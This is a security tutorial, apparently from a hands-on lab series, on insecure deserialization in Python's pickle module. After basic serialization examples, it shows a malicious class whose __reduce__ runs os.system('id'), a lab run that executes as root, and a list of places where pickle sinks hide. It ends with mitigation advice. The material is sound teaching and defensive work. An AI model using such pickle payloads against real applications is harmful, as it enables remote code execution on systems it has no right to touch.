Insecure Deserialization - Python Pickle
pickle is a built-in Python module that provides functionality for serializing and deserializing Python objects.
Serialization, or pickling, is the process of converting a Python object into a byte stream as we explained before, which can then be saved to a file or transmitted over a network.
Conversely, deserialization, or unpickling, reconstructs the original Python object from the byte stream.
In this example, we will demonstrate how to serialize a Python object using the pickle module and then encode the resulting byte stream into a Base64 string:
import base64
import pickle
class PyFuUser:
def __init__(self, name):
self.name = name
def say_hello(self):
message = f"Hello, {self.name}!"
return message
pyfu_user = PyFuUser("Askar")
raw_pickled_data = pickle.dumps(pyfu_user)
print(f"Raw Pickled Data :\n{raw_pickled_data}")
print("=" * 30)
base64_pickled_data = base64.b64encode(raw_pickled_data).decode()
print(f"Base64 Pickled Data :\n{base64_pickled_data}")
Here, we used pickle.dumps to serialize an instance of the PyFuUser class into a raw byte stream, this byte stream is stored in the raw_pickled_data variable.
And to make the byte stream easily transferable, we encoded the data as base64 string.
In addition to converting Python objects into byte streams in memory, the pickle module allows you to serialize and persist objects to files.
This is useful for storing application state, caching, or saving complex data structures between executions.
The following example shows how to serialize an object and save it to a file:
import pickle
class PyFuUser:
def __init__(self, name):
self.name = name
def say_hello(self):
message = f"Hello, {self.name}!"
return message
pyfu_user = PyFuUser("Askar")
with open("pickled_user.pickle", "wb") as f:
pickle.dump(pyfu_user, f)
Here, pickle.dump() serializes the PyFuUser object and writes the resulting byte stream to the file pickled_user.pickle.
And to deserialize and load the object from the file we can use this code:
import pickle
class PyFuUser:
def __init__(self, name):
self.name = name
def say_hello(self):
message = f"Hello, {self.name}!"
return message
with open("pickled_user.pickle", "rb") as f:
loaded_user = pickle.load(f)
print(loaded_user.say_hello())
This reads the serialized data, reconstructs the original object, and calls its method as expected.
Create a Malicious Pickle
Python’s pickle module is inherently insecure when handling untrusted input.
One of the reasons is the __reduce__() method, which allows developers to define how an object should be serialized and deserialized.
Attackers can abuse this to inject arbitrary code execution into the deserialization process.
Here’s a basic example of creating a malicious pickle that executes a system command:
import pickle
class MaliciousPickle:
def __reduce__(self):
import os
return (os.system, ("id", ))
payload = MaliciousPickle()
with open("pickled_user.pickle", "wb") as f:
pickle.dump(payload, f)
In this example, the __reduce__() method returns a tuple instructing pickle to call os.system("id") during deserialization and When a target application later calls pickle.load() on this file, the command will be executed immediately.
This demonstrates why deserializing data from untrusted sources is dangerous and why pickle should never be used with user-controlled input.
A key detail in exploiting Python’s pickle module is that the target application does not need to explicitly import the modules used in the malicious payload.
This is because the __reduce__() method, which is part of Python’s pickling protocol, allows the attacker to define exactly how the object should be reconstructed including which functions or modules should be invoked.
Running it in the lab
docker compose run --rm generic-py-fu sh -c "python3 pickling-file-exploit.py; python3 unpickling-file.py"
uid=0(root) gid=0(root) groups=0(root)
The malicious class defines __reduce__ to return (os.system, ("id",)). pickle.load executes that while reconstructing the object, so the command runs before any of the program’s own code touches the data.
Why pickle deserialization matters from an offensive security perspective
I value a reachable pickle.loads more than almost any other Python sink because it is direct, unconditional remote code execution. There is no gadget chain to assemble, no filter to evade, no second-stage primitive to find: __reduce__ lets my payload name the callable and its arguments, and the loader runs it while reconstructing the object. The target never imports os and never writes a line that touches my data; the command fires before the program logic resumes.
What an attacker prizes is how invisible the sink is. Pickle hides inside everything that needs to move a Python object, so the vulnerable call is rarely a literal pickle.loads in the route handler. It rides along under caching layers, task queues, session cookies, and inter-service messaging, and the developer who chose those libraries often has no idea pickle is underneath.
Where I look for a reachable sink in an assessment:
- Session and auth cookies that decode to pickle, the cleanest path from unauthenticated request to RCE (see Authentication Bypass via Unsafe Python Deserialization).
- Cache backends such as Django/Flask cache layers and
memcached/diskcacheclients configured with a pickle serializer. - Task queues like Celery, RQ, and Dramatiq, where message bodies are unpickled by workers.
shelvefiles and.pklmodel artifacts loaded from shared or user-writable storage (see Insecure Deserialization - Python Shelve).- Any
pickle.loadover the network, including custom RPC and “load saved state” features.
The audit tell is any decode of attacker-influenced bytes that resolves to pickle, whether the call is explicit or buried in a serializer setting. For defenders the takeaway is to treat every reachable pickle.loads on untrusted input as already-achieved code execution.
Mitigation
The fix is to never unpickle data that crossed a trust boundary, because pickle.loads is by design a code-execution primitive and cannot be made robustly safe by inspection or a restricted unpickler. Use a data-only format such as JSON for untrusted input, and where Python objects genuinely must be exchanged, sign the serialized bytes with a secret-keyed MAC and verify that signature before deserializing so only data your own service produced is ever loaded. Treat any reachable pickle.loads on untrusted input as remote code execution.